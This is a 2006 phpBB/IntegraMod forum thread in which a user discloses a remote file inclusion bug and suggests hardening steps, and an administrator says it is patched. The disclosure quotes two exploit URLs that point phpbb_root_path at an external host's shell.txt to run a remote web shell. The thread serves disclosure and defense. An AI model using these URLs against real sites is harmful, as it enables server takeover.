how can protect from !

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

how can protect from !

PostAuthor: sasan » Thu Aug 31, 2006 4:31 am

hi guys all know my nam is sasan i have a security forum and my last ID in this forum and integramod site is 4shir ! i love fube and integramod and cant see the forum of integra hacked by kidi and scripts hacker!!!!! <img> if you want know whats integra mod can see this lins
http://[target]/[patch]/includes/functions_mod_user.php?phpbb_root_path=http://url--ataca.org/shell.txt?
#
# http://[target]/[patch]/includes/functions.php?phpbb_root_path=http://url--ataca.org/shell.txt?

its new bug for integra mod this in File Inclusion Vulnerabilities class ! and hacker can use a external shell on your board !! if want dont hack whit this method
1- pleas off global register
2- redirect all invalid links
3- chang all 777 folder permishon or upload a htasec on this folder
3 - and a powerfull its you set password for your folder such includs templat and...
i back and see more an also put here last bug for integra
Last edited by sasan on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

sasan
Newbie
Newbie
 
Posts: 14
Likes: 0 post
Liked in: 0 post
Joined: Fri May 19, 2006 6:13 am
Cash on hand: 0.00

Re: how can protect from !

PostAuthor: Michaelo » Thu Aug 31, 2006 5:22 am

Thanks sasan, the security holes have been plugged... your second link references functions_mod_user.php which doesn't exist in 140 or 141 (i can find it) must be an old file.

Adding passowrd protection via htaccess to the other folders is a good idea, currently we use the index.html method... so if anyone browses to a folder all they get is a simple index file....

Which reminds me... Guys make sure there is a copy of the simple index.html in all folders that don't contain a real index.php... this should be as good a method as htaccess password protection and a great deal faster.

Thanks for the input, if you come across and other security leaks please contact us asap.
Mike
Last edited by Michaelo on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Kiss Portal Engine phpbbireland (status: Released)
User avatar
Michaelo
Administrator
Administrator
 
Posts: 1646
Likes: 0 post
Liked in: 0 post
Joined: Sat Mar 11, 2006 5:14 pm
Cash on hand: 0.00
Location: Dublin, Ireland


Return to Forum Security

Who is online

Registered users: Bing [Bot], Helter, Majestic-12 [Bot]